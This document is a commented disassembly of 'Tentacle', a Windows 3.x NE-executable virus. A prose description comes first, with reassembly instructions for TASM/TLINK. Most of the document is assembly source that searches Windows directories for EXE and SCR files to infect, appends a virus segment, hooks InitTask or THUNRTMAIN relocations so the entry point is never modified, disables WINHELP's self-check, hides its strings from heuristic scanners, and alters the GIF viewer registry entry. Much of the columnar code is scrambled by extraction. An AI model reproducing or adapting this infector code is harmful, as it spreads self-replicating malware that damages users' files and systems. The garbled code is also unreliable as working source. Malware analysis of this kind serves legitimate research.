Description: When the virus gets activated, it starts to search and infect NE EXE files, first one *.EXE file in the current directory, then two in the C:\WINDOWS directory, then one in some other possible hardcoded windows directories (C:\WIN, C:\WIN31, C:\WIN311, C:\WIN95), and then one *.SCR file in the current dir. While infection the virus creates a temporary file C:\TENTACLE.$$$ and rebuilds there an infected image of the victim file. When the infection process is finished this file is copied back over the victim file and then deleted. The infection technique is adding another segment with the virus code at the end of the file. To add its own entry to the segment table, it checks if there is enough unused room between the end of the NE header tables and the start of the first segment and aborts infection if not. Then it shifts back all tables after the segment table (therefore overwriting the unused fill bytes) and fixes their offsets in the NE header, so that it can write its own segment descriptor at the end of the segment table. In a similar way it adds its own entries to the module-reference and the imported-names table (this is necessary to import two APIs that are used in the payload). The most interesting feature of the virus is that it was one of the first (if not the very first) viruses using EPO techniques, that means infecting the file without modifying its entry point. To do so, it searches the code segment that contains the entry point for a call to the INITTASK API from KERNEL.DLL, or, if that one is not found, the THUNRTMAIN API from VBRUN300.DLL, this are APIs that should be in the very beginning of a program. Then the relocation item that is associated with the API call is patched in such a way that this call is redirected to the virus. While infecting, the virus pays special attention to the WINHELP.EXE files. This file contains a self-check in Win3.11. And that's why the virus patches it in a special way, so that this self-check is disabled. The payload is activated if the virus is run between 1:00am and 1:05am - The virus drops a file C:\TENTACLE.GIF containing a picture of the violet tentacle from the classical computer game "the day of the tentacle" and modifies the registry in such a way that whenever the program associated with .GIF files is run to view such a file it displays the file dropped by the virus. To do so it uses two imported APIs RegSetValue and RegQueryValue from SHELL.DLL. Additionally, if the virus is executed between 1:15am and 2:00am it runs the opposite effect and undoes the changes in the registry that were done in the payload. Reassembly tested with Tasm 3.1 and TLink 3.0 . TASM /M tenta2 TLINK tenta2 first generation sample is a DOS EXE file and infects all suitable EXE files in the current directory only. %

virus_size

EQU (offset virus_end - offset virus_start)

.model tiny .code .386 org 0 virus_start: segm_offset segm_phys_size segm_attribs segm_virt_size

dw dw dw dw

0 virus_size 0001110101010000b ; readable code segment with relocs virus_size

dd dd dd

0000FFFFh 0000FFFFh 0000FFFFh

reloc_stuff: ; pointers that will become relocated ; must be initialised by 0000:FFFF

; This is the real start of the relocation data: dw 3 ; three relocation items db 3 ; 32bit far pointer db 1 ; imported ordinal dw offset RegQueryValue ; offset of relocation item size_of_reloc_stuff1 EQU ($ - reloc_stuff) dw 0 ; will become module-reference index reloc_stuff2 dw 6 ; ordinal RegQueryValue db 3 ; 32bit far pointer db 1 ; imported ordinal dw offset RegSetValue ; offset of relocation item size_of_reloc_stuff2 EQU ($ - reloc_stuff2) dw 0 ; will become module-reference index reloc_stuff3 dw 5 ; ordinal RegSetValue db 3 ; 32bit far pointer db 1 ; imported ordinal dw offset org_entry; offset of relocation item size_of_reloc_stuff3 EQU ($ - reloc_stuff3) dw 0 ; will become module-reference index dw 0 ; will become ordinal of hooked API virus_entry: push pusha

ds

; save DS ; save all registers

ss

; DS=SS

sub mov

sp,size stack_frame bp,sp

; reserve room on stack ; setup stack frame

mov lea int

ah,1Ah dx,[bp.dta] 21h

; set DTA to DS:DX ; DS:DX=our DTA in our stack frame

push pop ds

mov bx,1 mov mov CALL

cx,offset empty_string dx,offset exe_wildcard infect_directory

; infect one EXE file in current dir

mov bx,2 mov mov CALL

cx,offset C_windows dx,offset exe_wildcard infect_directory

; infect two EXE files in C:\WINDOWS

mov bx,1 mov mov CALL

cx,offset C_win dx,offset exe_wildcard infect_directory

; infect one EXE file in C:\WIN

mov bx,1 mov mov CALL

cx,offset C_win31 dx,offset exe_wildcard infect_directory

; infect one EXE file in C:\WIN31

mov bx,1 mov mov CALL

cx,offset C_win311 dx,offset exe_wildcard infect_directory

; infect one EXE file in C:\WIN311

mov bx,1 mov mov CALL

cx,offset C_win95 dx,offset exe_wildcard infect_directory

; infect one EXE file in C:\WIN95

mov bx,1 mov mov CALL

cx,offset empty_string dx,offset scr_wildcard infect_directory

; infect one SCR in current dir

mov mov inc push push pop int

ah,1Ah dx,7Fh dx ds es ds 21h

; set DTA to DS:DX ; DX=80h (standart DTA offset)

pop

ds

; restore DS

mov int

ah,2Ch 21h

; get the system time to CX/DX ; CH=hours, CL=minutes, DH=seconds ; DL=1/100 seconds

cmp cx,100h JB restore_host cmp cx,105h JB change_gif_cmdline cmp cx,10Fh JB restore_host cmp cx,200h JAE restore_host mov ax,0 JMP call_payload change_gif_cmdline: mov ax,1 call_payload: CALL payload

restore_host:

; save DS ; DS=ES=PSP (or equivalent) segment

; ; ; ; ; ; ; ; ; ;

is it before 1:00am ? if yes, no payload is it before 1:05am ? call payload between 1:00 and 1:05 is it before 1:15am ? if yes, no payload is it after 2:00am ? if yes, no payload restore old gif commandline call payload between 1:15 and 2:00

; change gif commandline to our file ; play with the gif commandline in ; the win16 "registry".

C_win

; ; ; ;

add

sp,size stack_frame

; free room on stack

popa pop JMP

ds cs:org_entry

; ; ; ;

restore restore jump to for the

all registers DS the API that was hooked EPO while infection.

db "C:\WIN\", 0

The following two subroutines are not used in the whole virus. I guess that they were just used in the first generation sample, and accidentally left in by the virus author. That's why I also used them in the first generation carrier of the disassembly.

encrypt_wildcard: push si push di push es push pop es

; save SI ; save DI ; save ES

ds

; ES=DS

mov xor mov repne dec mov

di,si al,al cx,0FFFFh scasb di ax,di

sub

ax,si

; ; ; ; ; ; ; ;

pop pop

es di

; restore ES ; restore DI

mov

cx,ax

; CX=length of string

encrypt_wildcard_loop: inc byte ptr [si] inc si loop encrypt_wildcard_loop pop

DI=SI AL=0 search whole segment search for the end of the string go back to the terminating zero AX=end of string SI=start of string AX=length of string

; encrypt one byte from string ; next byte

si

; restore SI

si di es

; save SI ; save DI ; save ES

ds

; ES=DS

di,si al,al cx,0FFFFh scasb di ax,di

; ; ; ; ; ; ;

RET

encrypt_path: push push push push pop es mov xor mov repne dec mov

DI=SI AL=0 search whole segment search for the end of the string go back to the terminating zero AX=end of string SI=start of string

sub

ax,si

; AX=length of string

pop pop

es di

; restore ES ; restore DI

mov

cx,ax

; CX=length of string

encrypt_path_loop: dec byte ptr [si] inc si loop encrypt_path_loop pop

SI

; encrypt one byte from string ; next byte

; restore SI

RET

; ----- DECRYPT PATH STRING ------------------------------------------------; Entry: ; SI - pointer to source buffer ; DI - pointer to destination buffer ; Exit: ; DI - end of destination buffer decrypt_path: cld

; clear direction flag

push push

di es

; save DI ; save ES

push pop es

ds

; ES=DS

mov xor mov repne dec mov

di,si al,al cx,0FFFFh scasb di ax,di

sub

ax,si

; ; ; ; ; ; ; ;

pop pop

es di

; restore ES ; restore DI

mov inc JMP

cx,ax cx loop_decrypt_path

; CX=length of string ; because the LOOP immedeately follows

decrypt_path_loop: lodsb inc al stosb loop_decrypt_path: loop decrypt_path_loop movsb RET

DI=SI AL=0 search whole segment search for the end of the string go back to the terminating zero AX=end of string SI=start of string AX=length of string

; load a byte from source string ; decrypt it ; store decrypted byte

; move terminating zero

; ----- DECRYPT WINDCARD STRING --------------------------------------------; Entry:

; SI - pointer to source buffer ; DI - pointer to destination buffer ; Exit: ; DI - end of destination buffer decrypt_wildcard: cld push push

di es

; save DI ; save ES

push pop es

ds

; ES=DS

mov xor mov repne dec mov

di,si al,al cx,0FFFFh scasb di ax,di

sub

ax,si

; ; ; ; ; ; ; ;

pop pop

es di

; restore ES ; restore DI

mov inc JMP

cx,ax cx loop_decrypt_wildcard

; CX=length of string ; because the LOOP immedeately follows

decrypt_wildcard_loop: lodsb dec al stosb loop_decrypt_wildcard: loop decrypt_wildcard_loop movsb RET

C_windows empty_string

; ; ; ; ; ;

; clear direction flag

DI=SI AL=0 search whole segment search for the end of the string go back to the terminating zero AX=end of string SI=start of string AX=length of string

; load a byte from source string ; decrypt it ; store decrypted byte

; move terminating zero

db "C:\WINDOWS\" db 0

----- INFECT A DIRECTORY -------------------------------------------------INPUT: BX - number of files to infect CX - ptr to path to infect (encrypted) DX - ptr to file wildcard ("*.EXE" or "*.SCR", also encrypted)

infect_directory: push ds push es

; save DS ; save ES

push pop ds

cs

; DS=CS

push pop es

ss

; ES=SS

si,cx

; SI=ptr to path to decrypt

mov

lea

di,[bp.full_filespec]

push CALL

cx decrypt_path

; ; ; ;

dec

di

; skip the terminating zero

decrypt_wildcard

; decrypt the wilcard to full_filespec

pop lea CALL dec

si di,[bp.full_filename] decrypt_path di

; restore ptr to path in SI

pop pop

es ds

; restore ES ; restore DS

mov mov lea JMP

ah,4Eh cx,2 dx,[bp.full_filespec] do_file_search

; find first file ; normal and hidden files

push push

es di

; save ES ; save DI

push pop es

ss

; ES=SS

mov si,dx CALL

DI=ptr to where full wildcard will be stored ("C:\path\*.ext") save CX (pointer to path) decrypt the path to full_filespec

; skip the terminating zero

do_file:

;*

cld lea

si,[bp.dta+1Eh]

mov rep

cx,13 movsb

; ; ; ; ; ;

pop pop

di es

; restore DI ; restore ES

test JZ

byte ptr [bp.dta+15h],1 ; read only attribute set? not_readonly

push

dx

; save DX

mov add xor mov and db lea int

ax,3000h ax,1301h ch,ch cl,[bp.dta+15h] cx,0FFFEh 83h,0E1h,0FEh dx,[bp.full_filename] 21h

; AX=4301h (set file attributes)

pop

dx

; restore DX

JC

findnext

; error? if so, search on

infect_file findnext bx done_directory

; ; ; ;

not_readonly: CALL JC dec JZ

; ; ; ; ;

clear direction flag SI=ptr to found filename in DTA DI points after the path in full_filename 8.3 filename (zero terminated) copy filename

set high byte of attributes to zero CL=low byte of attributes delete read-only attribute fixup - byte match DS:DX=ptr to filename (with path)

infect the file! on error while infecting search on! decrement infection counter enough files infected?

findnext: mov

ah,4Fh

do_file_search: int 21h JNC do_file

; find next file

; do the file search ; if no error happened, process file

done_directory: RET

C_win31

db "C:\WIN31\", 0

exe_wildcard scr_wildcard

db "*.EXE", 0 db "*.SCR", 0

; ----- INFECT THE FILE ----------------------------------------------------infect_file: pushad mov lea int 21h JC mov mov CALL mov mov lea int 21h JC

;*

;*

; save all 32bit registers ax,3D00h dx,[bp.full_filename]

; open file read-only ; DS:DX=pointer to filename

exit_infect bx,ax [bp.source_handle],ax

; exit on error ; file handle to BX ; save file handle

get_file_date_time_size ah,3Fh cx,64 dx,[bp.rw_buffer]

; read DOS header ; DOS header size ; Load effective addr

close_file

mov dec cmp JNE

ax,word ptr [bp.rw_buffer] ; AX=exe marker ax ; anti-heuristic ax,"ZM"-1 ; EXE file? close_file ; close if not

cmp db JE

word ptr [bp.rw_buffer+0Ch],0FFFEh ; maxmem item in DOS ; header is infection marker 81h,0BEh,0A9h,0,0FEh,0FFh ; fixup - byte match close_file ; if equal, file is already infected

cmp db JNE

word ptr [bp.rw_buffer+0Ch],0FFFFh ; maxmem must be standart 81h,0BEh,0A9h,0,0FFh,0FFh ; fixup - byte match close_file ; if not, don't infect

mov cmp JB

word ptr [bp.rw_buffer+0Ch],0FFFEh ; mark as infected word ptr [bp.rw_buffer+18h],40h ; new exe file? close_file ; if not, then close

; set tmp_filename to "C:\TENTACLE.$$$", 0 mov dword ptr [bp.tmp_filename+6],0F59E6305h add dword ptr [bp.tmp_filename+6],56A4DE4Fh mov word ptr [bp.tmp_filename+0],":C" mov dword ptr [bp.tmp_filename+10],"$$.E" mov dword ptr [bp.tmp_filename+2],0B1704BC2h add dword ptr [bp.tmp_filename+2],9CD5089Ah mov word ptr [bp.tmp_filename+14],"$"

mov mov lea int 21h JC mov

ah,3Ch cx,2 dx,[bp.tmp_filename]

; create temporary file ; with hidden attributes ; DS:DX=ptr to filename

close_file [bp.dest_handle],ax

; exit on error ; save temp file handle

mov mov mov lea int JC

ah,40h bx,[bp.dest_handle] cx,64 dx,[bp.rw_buffer] 21h close_tmp_file

; ; ; ;

mov mov sub CALL JC

ecx,dword ptr [bp.rw_buffer+3Ch] ; ECX=new exe header offset [bp.new_header_offs],ecx; store it ecx,64 ; size of dos header (already written) copy_file_block ; copy rest of DOS stub close_tmp_file

mov mov mov lea int 21h JC mov inc cmp JNE

bx,[bp.source_handle] ah,3Fh cx,64 dx,[bp.rw_buffer]

; ; ; ;

write DOS header of temp file BX=file handle CX=length to write DS:DX=address write buffer

BX=handle of victim file read NE header size of NE header DX=offset of buffer

close_tmp_file ax,word ptr [bp.rw_buffer] ; AX=new exe marker ax ; anti-heuristic ax,"EN"+1 ; NE exe file? close_tmp_file ; if not, then abort infection

mov mov shl mov mov mov shr mov

cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift eax,1 ; EAX=1 eax,cl ; EAX=alignment unit [bp.alignment_unit],eax ; save it cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift eax,[bp.file_size] ; EAX=filesize eax,cl ; EAX=filesize in alignment units [bp.new_sect_descr+0],ax ; save it as offset for the new ; segment that is going to be created mov eax,[bp.alignment_unit] ; EAX=alignment unit dec eax ; set all bits below alignemt test eax,[bp.file_size] ; filesize already aligned? JZ filesize_already_aligned inc word ptr [bp.new_sect_descr+0] ; if not, round it up filesize_already_aligned: mov ax,cs:segm_phys_size ; copy physical size of segment mov [bp.new_sect_descr+2],ax mov ax,cs:segm_attribs ; copy segment attributes mov [bp.new_sect_descr+4],ax mov ax,cs:segm_virt_size ; copy virutal size of segment mov [bp.new_sect_descr+6],ax cmp JNE

word ptr [bp.rw_buffer+22h],40h ;is the segment table directly ; after the NE header (standart case)? close_tmp_file ; if not, better not infect the file

CALL JC mov mov

EPO close_tmp_file [bp.module_ordinal],eax ; save module index and ordinal [bp.our_reloc_offs],edx ; save offset of relocation item

xor mov add

eax,eax ; EAX=0 ax,word ptr [bp.rw_buffer+22h] ; EAX=offset of segment ; descriptor table from NE hdr eax,[bp.new_header_offs]; EAX=offset of segment descriptor ; table from file start

push pop dx pop cx mov int 21h

eax

; CX:DX=EAX

ax,4200h

; go to segment descriptor table

mov mov lea int 21h JC

ah,3Fh ; read the offset of the first segment cx,2 ; read a word dx,[bp.first_segm_offs] ; DX=offset read buffer close_tmp_file

mov

ax,4201h

mov mov int

cx,-1 dx,-2 21h

JC

close_tmp_file

xor mov

eax,eax ; EAX=0 ax,word ptr [bp.first_segm_offs]

mul mov

; move file pointer relative to ; current position ; CX:DX=-2 (new filepointer position) ; set the filepointer back to the ; start of the segment table

; EAX=aligned file offset ; of first segment [bp.alignment_unit] ; EAX=file offset of the 1st segment [bp.first_segm_offs],eax; save it

mov ebx,dword ptr [bp.rw_buffer+2Ch] ; EBX=beginning of the nonresident-name table (relative to filestart). ; This should be the last table in the NE header. xor mov

;*

add mov

; ECX=0 ; ECX=size of nonresident name ; table in bytes ebx,ecx ; EBX=size of NE header + all tables dword ptr [bp.end_of_NE_hdr],ebx

sub

eax,ebx

; EAX=free room between the end of ; the NE header and the first segment

cmp

eax,10h

db JL

66h,83h,0F8h,10h close_tmp_file

; ; ; ; ; ;

mov inc mov mov mov

ax,word ptr [bp.rw_buffer+1Ch] ; ax ; word ptr [bp.rw_buffer+1Ch],ax ; word ptr [bp.new_entry_CS],ax ; word ptr [bp.new_entry_IP],offset

and

ecx,ecx cx,word ptr [bp.rw_buffer+20h]

is there enough room left so we can add our stuff (a segment descriptor, a module reference and an imported name) ? fixup - byte match if not, we can't infect the file

segment count add another segment save new segment count new entry segment index virus_entry ; set new ; entry IP byte ptr [bp.rw_buffer+37h],011110111b ; windows flags: ; kill gangload area

; fixup the offsets of the other NE header tables (all are after the segment

; table and therefore shifted back). It is assumed that all tables are in the ; same order in the file as their offsets are stored in the NE header (except ; for the entry table, which should be the second last). add add add add add add

word ptr [bp.rw_buffer+4h],16 word ptr [bp.rw_buffer+24h],8 word ptr [bp.rw_buffer+26h],8 word ptr [bp.rw_buffer+28h],8 word ptr [bp.rw_buffer+2Ah],10 dword ptr [bp.rw_buffer+2Ch],16

; ; ; ; ; ;

inc

word ptr [bp.rw_buffer+1Eh]

; one more entry in ; module-reference table

mov mov mov lea int 21h JC xor mov dec shl

ah,40h bx,[bp.dest_handle] cx,64 dx,[bp.rw_buffer]

; ; ; ;

entry table resource table resident-name table module-reference table imported-name table nonresident-name table

write modified NE header to tmp file BX=temp file handle NE header size DX=write buffer offset

close_tmp_file

CALL JC

ecx,ecx ; ECX=0 cx,word ptr [bp.rw_buffer+1Ch] ; EAX=number of segments cx ; ECX=old number of segments cx,3 ; shl 3 means mul 8 (size of a ; segment descriptor) ; ECX=old size of segm descriptor tbl copy_file_block ; copy segment descriptor table close_tmp_file

mov

ah,40h

mov lea int 21h JC xor mov

cx,8 dx,[bp.new_sect_descr]

; ; ; ;

write our own segment descriptor to the file size of a segment descriptor DX=offset of write buffer

close_tmp_file

CALL JC

ecx,ecx ; ECX=0 cx,word ptr [bp.rw_buffer+2Ah] ; ECX=offset of imported-name ; table from NE header ax,word ptr [bp.rw_buffer+1Ch] ; entries in segment table ax ; AX=old number of segments ax,3 ; multiply with 8 (size of a ; segment descriptor) ax,word ptr [bp.rw_buffer+22h] ; add offset of segment table ; (from NE header) ; AX=offset end of segment table ; relative to the NE header cx,ax ; CX=length of stuff between the ; segment table and the imported-name ; table (resource, resident-name and ; module-reference tables) cx,10 ; because the imported-name table ; offset has already been increased ; by 10 before copy_file_block ; copy all those tables close_tmp_file

mov

ax,word ptr [bp.rw_buffer+4]

sub

ax,6

sub

ax,word ptr [bp.rw_buffer+2Ah]

mov dec shl add

sub

sub

; offset entry table (from ; NE header) ; AX=end of old imported-name table ; ECX=offset of imported-name

mov

word ptr [bp.tmp_buffer],ax

mov

ah,40h

mov lea int 21h JC xor mov

cx,2 dx,[bp.tmp_buffer]

; ; ; ; ;

; ; ; ;

table from NE header AX=offset into imported-name table (the one of the module name we're going to add)

append our new entry into the module reference table, the offset of the new module name write one word DS:DX=pointer to write buffer

close_tmp_file

CALL JC

ecx,ecx ; ECX=0 cx,word ptr [bp.rw_buffer+4] ; offset entry table (from ; NE header) cx,6 ; CX=end of old imported-name table cx,word ptr [bp.rw_buffer+2Ah] ; offset of imported-names ; table from NE header copy_file_block ; copy imported-name table close_tmp_file

mov

ah,40h

sub sub

mov mov mov add lea int 21h JC mov

; append our module name to the ; imported-name table cx,6 ; length to write word ptr [bp.tmp_buffer+4],"LL" ; create the string dword ptr [bp.tmp_buffer],6DBBFE87h ; 5, "SHELL" dword ptr [bp.tmp_buffer],0D78C547Eh ; in tmp_buffer dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer close_tmp_file

JC

; end of NE header+all tables ; (offset from filestart cx,word ptr [bp.rw_buffer+4] ; offset entry table (from ; NE header) cx,word ptr [bp.new_header_offs]; BUG! this should be a sub, ; no add! but because the ; filepointer is set new ; immedeately afterwards, this ; never causes any problems. copy_file_block ; copy the rest of the header ; (entry and nonresident-name tables) close_tmp_file

mov

ax,4200h

sub add

CALL

push pop pop cx int 21h JC mov mov push pop pop cx int 21h JC

cx,word ptr [bp.end_of_NE_hdr]

; set filepointer in the destination ; (temp) file to the start of the ; first segment. dword ptr [bp.first_segm_offs] dx ; CX:DX=first segment offset

close_tmp_file ax,4200h

; set filepointer in the source file ; to the start of the first segment

bx,[bp.source_handle] dword ptr [bp.first_segm_offs] dx ; CX:DX=first segment offset

close_tmp_file

mov CALL

ecx,0FFFFFFFFh copy_file_block

JC

close_tmp_file

xor mov mov shl

eax,eax ; EAX=0 ax,[bp.new_sect_descr+0]; EAX=aligned offset of our segment cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift eax,cl ; EAX=offset of our segment in bytes

push pop dx pop cx mov mov int 21h JC mov mov

mov push push pop ds int 21h pop JC

; whole file body ; copy the file body (all segments ; and relocations)

eax

; CX:DX=EAX

ax,4200h bx,[bp.dest_handle]

; go to our segment offset in file ; BX=temp file handle

close_tmp_file ah,40h ; write virus body to file cx,(RegQueryValue-virus_start) ; write whole virus body ; excluding the three pointers that ; must be relocated and therefore ; initialised with 0000:FFFF dx,offset virus_start ; DX=offset write buffer=virus body ds ; save DS cs ; DS=CS

ds close_tmp_file

; restore DS

ah,40h cx,size_of_reloc_stuff1 dx,offset reloc_stuff ds cs

; ; ; ; ;

pop JC

ds close_tmp_file

; restore DS

mov mov lea

ah,40h ; cx,2 ; dx,ss:[bp.rw_buffer+1Eh]; ; ;

mov mov mov push push pop ds int 21h

int 21h JC mov mov mov push push pop ds int 21h

write relocation stuff size of relocation stuff DX=offset write buffer save DS DS=CS

write module index one word number of entries in module reference table - our module reference is the last

close_tmp_file ah,40h cx,size_of_reloc_stuff2 dx,offset reloc_stuff2 ds cs

; ; ; ; ;

write relocation stuff size of relocation stuff DX=offset write buffer save DS DS=CS

pop JC

ds close_tmp_file

; restore DS

mov

ah,40h

; write module index

mov lea

int 21h JC mov mov mov push push pop ds int 21h pop ds JC mov

cx,2 ; dx,ss:[bp.rw_buffer+1Eh]; ; ;

one word number of entries in module reference table - our module reference is the last

close_tmp_file ah,40h cx,size_of_reloc_stuff3 dx,offset reloc_stuff3 ds cs

; ; ; ; ;

write relocation stuff size of relocation stuff DX=offset write buffer save DS DS=CS

; ; ; ; ;

write the reference to the API we hooked for the EOP CX=4 (size to write) ??? DS:DX=pointer to write buffer

close_tmp_file ah,40h

mov shl lea int 21h JC

cx,2 cx,1 dx,[bp.module_ordinal]

push pop pop cx mov int JC

[bp.our_reloc_offs] dx

; CX:DX=offset of the relocation item ; that has to be modifies

ax,4200h 21h close_tmp_file

; set filepointer relative to ; filestart

mov mov mov lea int 21h JC

ah,40h ; write relocation type cx,2 ; one word word ptr [bp.tmp_buffer],3 ; 32bit far ptr/internal reference dx,[bp.tmp_buffer] ; DS:DX=pointer to write buffer

mov mov mov int 21h JC mov mov shl lea int 21h JC

close_tmp_file

close_tmp_file ax,4201h cx,0 dx,2

; ; ; ;

set new file pointer relative to current position CX:DX=2 (skip the offset of the dword that must be relocated)

; ; ; ; ;

write a far pointer to the virus entrypoint. CX=4 (size to write) ??? DS:DX=pointer to write buffer

close_tmp_file ah,40h cx,2 cx,1 dx,[bp.new_entry_CS] close_tmp_file

cmp dword ptr [bp.dta+24h],"XE.P" ; check the filename of the JNE not_winhelp ; victim for "WINHELP.EXE" and try to mov eax,dword ptr [bp.dta+20h] ; patch it if the filename matches add eax,98F5548Ah cmp eax,"LEHN"+98F5548Ah JNE not_winhelp cmp word ptr [bp.dta+28h],"E" JNE not_winhelp

cmp JNE CALL not_winhelp:

word ptr [bp.dta+1Eh],"IW" not_winhelp patch_winhelp

mov int 21h

ah,3Eh

; close temp file

mov mov int 21h

bx,[bp.source_handle] ah,3Eh

; BX=victim file handle ; close victim file

lea mov int 21h

dx,[bp.tmp_filename] ax,3D00h

; DS:DX=pointer to temp file name ; reopen temp file read-only

JC mov

delete_tmp_file [bp.source_handle],ax

; save handle

mov mov lea int 21h JC

ah,3Ch cx,0 dx,[bp.full_filename]

; truncate victim file ; no attributes ; DS:DX=ptr to full victim filename

delete_tmp_file

mov mov

bx,ax [bp.dest_handle],ax

; handle to BX ; save handle

mov CALL

ecx,0FFFFFFFFh copy_file_block

; copy the whole temp file over the ; victim file

mov ax,3000h add ax,2701h mov bx,[bp.dest_handle] mov dx,[bp.file_date] mov cx,[bp.file_time] int 21h

; AX=5701h - set file date and time

mov int 21h

ah,3Eh

; close victim file

mov mov int 21h

bx,[bp.source_handle] ah,3Eh

; BX=handle of temp file ; close temp file

lea mov int 21h

dx,[bp.tmp_filename] ah,41h

; DS:DX=pointer to temp file name ; delete temp file

clc JMP

; BX=handle of victim file ; CX=old file date ; DX=old file time

; clear carry flag (indicate success) exit_infect

close_tmp_file: mov bx,[bp.dest_handle] mov ah,3Eh int 21h

; BX=handle of temp file ; close temp file

delete_tmp_file: lea dx,[bp.tmp_filename] mov ah,41h int 21h

; DS:DX=pointer to temp file name ; delete temp file

close_file:

mov mov int 21h

bx,[bp.source_handle] ah,3Eh

stc

; BX=handle of victim file ; close fictim file

; set carry flag (indicate error)

exit_infect: popad RET

; restore all 32bit registers

C_win311 db "C:\WIN311\", 0

; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE -------------------------get_file_date_time_size: push cx push dx mov int 21h

; save CX and DX

ax,5700h

; get date and time

mov mov

[bp.file_date],dx [bp.file_time],cx

; save date ; save time

xor xor mov int

cx,cx dx,dx ax,4202h 21h

; CX:DX=0 (distance to move)

mov mov

word ptr [bp.file_size+2],dx word ptr [bp.file_size],ax

xor xor mov int

cx,cx dx,dx ax,4200h 21h

; DX:CX=0 (distance to move)

dx

; restore DX and CX

pop pop cx

; ; ; ;

move filepointer relative to end of file in DX:AX the new filpointer is returned (filesize in this case) ; save filesize

; move filepointer relative to ; beginning of file

RET

C_win95 db "C:\WIN95\", 0

; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FILE -----------------------copy_file_block: pushad ; save all 32bit registers sub sp,256 ; allocate a 256 byte buffer from stack mov [bp.bytes_to_copy],ecx ; save length of block to copy mov dx,sp ; DX=offset buffer copy_file_block_loop: cmp [bp.bytes_to_copy],0 ; whole block moved? JE copy_file_block_done ; then we're done cmp [bp.bytes_to_copy],256 ; more than 256 bytes left? JBE copy_remaining_bytes_block

mov JMP

cx,256 read_file_block

; then just copy 256 bytes

copy_remaining_bytes_block: mov cx,word ptr [bp.bytes_to_copy] read_file_block: push cx mov bx,[bp.source_handle] mov ah,3Fh push ds push ss pop ds int 21h

; copy all bytes left

; ; ; ; ;

save size to read/write BX=handle of source file read from file function save DS DS=SS

ds bx,[bp.dest_handle] cx,ax ah,40h ds ss

; ; ; ; ; ;

restore DS BX=handle of destination file write as many bytes as were read write block to temporary file save DS DS=SS

pop cmp pop JNZ cmp

ds cx,ax cx copy_file_block_error cx,ax

JNE

copy_file_block_done

; ; ; ; ; ; ;

restore DS sizes of read block=written block ? restore size to read and write if not equal, then an error occured size of read/written block equal to the size we planned to read? if not, we're at the end of the file

cwde sub JMP

[bp.bytes_to_copy],eax copy_file_block_loop

; convert word to dword (AX->EAX) ; we've copied EAX bytes more ; copy next file block

pop mov mov mov push push pop ds int 21h

copy_file_block_error: stc JMP copy_file_block_ret copy_file_block_done: clc add sp,256 popad

; set carry flag (indicate error)

; clear carry flag (indicate success) ; remove buffer from stack ; restore all 32bit registers

copy_file_block_ret: RET

; ----- SEARCH MODULE NAME -------------------------------------------------; ; searches the module name pointed to by DX in the imported names table and ; returns in AX its number, otherwise indicates error with carry flag set search_module_name: push bx push es sub mov di,dx push

; save BX ; save ES

sp,256

; reserve a 256 bytes buffer on stack

ss

; ES=SS

pop es xor mov add

push pop dx pop cx mov int 21h JC mov mov shl mov int 21h JC xor mov add

push pop dx pop cx mov int 21h JC mov mov mov add int 21h JC mov xor JMP

eax,eax ; EAX=0 ax,word ptr [bp.rw_buffer+28h] ; ptr to module-reference ; table (from NE header) eax,[bp.new_header_offs]; EAX=ptr to module-reference table ; (from file start) eax

; CX:DX=EAX

ax,4200h

; set file pointer relative to ; file start to module reference table

module_name_not_found ah,3Fh ; read module reference table cx,word ptr [bp.rw_buffer+1Eh] ; number of entries in ; module reference table cx,1 ; multiply with two (each entry ; in module reference table is a word) dx,sp ; DS:DX=ptr to our buffer on stack module_name_not_found eax,eax ; EAX=0 ax,word ptr [bp.rw_buffer+2Ah] ; ptr to imported-names table ; (relative to NE header) eax,[bp.new_header_offs]; EAX=ptr to imported-names table ; relative to file start eax

; CX:DX=EAX

ax,4200h

; set file pointer relative to ; file start to imported-names table

module_name_not_found ah,3Fh cx,128 dx,sp dx,128

; ; ; ; ;

read imported-names table read 128 bytes DS:DX=ptr to buffer on stack assume module-reference table is not longer than 128 bytes too

module_name_not_found bx,sp ; BX=module-reference table buffer cx,cx ; CX=0 check_if_all_modules_done

search_module_name_loop: mov si,sp add si,128 add si,[bx]

; ; ; ; ;

SI=buffer on stack SI=imported-names table buffer add offset from module-reference table to get a actual entry in the imported-names table

push push

cx di

; save CX (module counter) ; save DI (offset of module name ; to search for)

xor

ch,ch

; CH=0

mov

cl,[si]

; length of this entry in the ; imported-names table

inc cld repe

cl

; also compare the string-length byte ; clear direction flag ; compare the strings

pop

di

pop

cx

JZ inc add

found_module_name cx bx,2

cmpsb

; restore DI (offset of module name ; to search for) ; restore CX (module counter)

; incerement CX (module counter) ; go to next entry in module; reference table

check_if_all_modules_done: cmp cx,word ptr [bp.rw_buffer+1Eh] ; done all modules ? JNE search_module_name_loop ; if not, search on JMP module_name_not_found ; if yes, the search failed found_module_name: mov ax,cx inc ax add sp,256 clc JMP exit_search_module_name

; ; ; ;

module_name_not_found: add sp,256 stc ; Set carry flag

; remove buffer from stack

exit_search_module_name: pop es pop bx RET

; restore ES ; restore BX

; ; ; ; ; ; ;

AX=module counter make counter start from 1 remove buffer from stack clear carry flag (indicate success)

----- EPO ENGINE ---------------------------------------------------------Entry: none Exit: EAX - module index (in MSW) and API ordinal (in LSW) of found reloc item EDX - file offset of relocation item to modify

EPO: ; create the string 6, "KERNEL" in tmp_buffer mov mov add add lea CALL JC mov JMP

dword ptr [bp.tmp_buffer+4],5AD5762Dh dword ptr [bp.tmp_buffer+0],0F220B44Bh dword ptr [bp.tmp_buffer+0],602496BBh dword ptr [bp.tmp_buffer+4],0A576CF21h dx,[bp.tmp_buffer] ; DX=pointer to 6, "KERNEL" search_module_name check_VBrun dx,5Bh ; ordinal of InitTask API search_API_reference

check_VBrun: ; create the string 8, "VBRUN300" in tmp_buffer mov dword ptr [bp.tmp_buffer+4],9062F740h mov dword ptr [bp.tmp_buffer+0],0EDC4FE68h

mov add add lea CALL JC mov

byte ptr [bp.tmp_buffer+8],"0" dword ptr [bp.tmp_buffer+4],9FD05715h dword ptr [bp.tmp_buffer+0],647D57A0h dx,[bp.tmp_buffer] ; Load effective addr search_module_name end_EPO dx,64h ; ordinal of THUNRTMAIN API

search_API_reference: push ax push dx xor mov add xor mov dec shl add push pop dx pop cx mov int 21h

; save AX (module index) ; save DX (API function ordinal)

